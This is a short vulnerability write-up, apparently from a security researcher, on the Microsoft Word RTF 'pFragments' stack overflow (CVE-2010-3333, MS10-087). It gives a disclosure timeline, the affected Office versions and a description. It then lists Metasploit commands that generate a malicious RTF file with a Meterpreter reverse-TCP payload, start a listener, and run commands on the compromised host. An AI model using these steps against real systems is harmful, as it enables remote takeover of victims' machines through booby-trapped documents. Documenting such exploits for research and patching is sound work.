Timeline :

Vulnerability discovered by wushi of team509
Initial Vendor Notification by iDefense the 2009-08-12
Initial Vendor Reply to iDefense the 2009-08-12
Coordinated Public Disclosure the 2010-11-09

    PoC provided by :

wushi of team509
unknown
jduck

    Reference(s) :

CVE-2010-3333
MS10-087

    Affected version(s) :

Microsoft Office XP Service Pack 3 before KB2289169
Microsoft Office 2003 Service Pack 3 before KB2289187
Microsoft Office 2007 Service Pack 2 before KB2289158
Microsoft Office 2010 (32-bit editions) before KB2289161
Microsoft Office 2010 (64-bit editions) before KB2289161
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac before KB2476512
Microsoft Office for Mac 2011before KB2454823
Open XML File Format Converter for Mac before KB2476511

    Tested on Windows XP SP3 with :

    Office 2003 SP3 msword.exe version 11.0.8328.0 (KB2344911 from 12 October 2010)

    Description :

This module exploits a stack-based buffer overflow in the handling of the ‘pFragments’ shape property within the Microsoft Word RTF parser. All versions of Microsoft Office prior to the release of the MS10-087 bulletin are vulnerable. This module does not attempt to exploit the vulnerability via Microsoft Outlook. The Microsoft Word RTF parser was only used by default in versions of Microsoft Word itself prior to Office 2007. With the release of Office 2007, Microsoft began using the Word RTF parser, by default, to handle rich-text messages within Outlook as well. It was possible to configure Outlook 2003 and earlier to use the Microsoft Word engine too, but it was not a default setting.

    Commands :

use exploit/windows/fileformat/ms10_087_rtf_­pfragments_bof
set FILENAME test.rtf
set OUTPUTPATH /home/eromang
show targets
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
ipconfig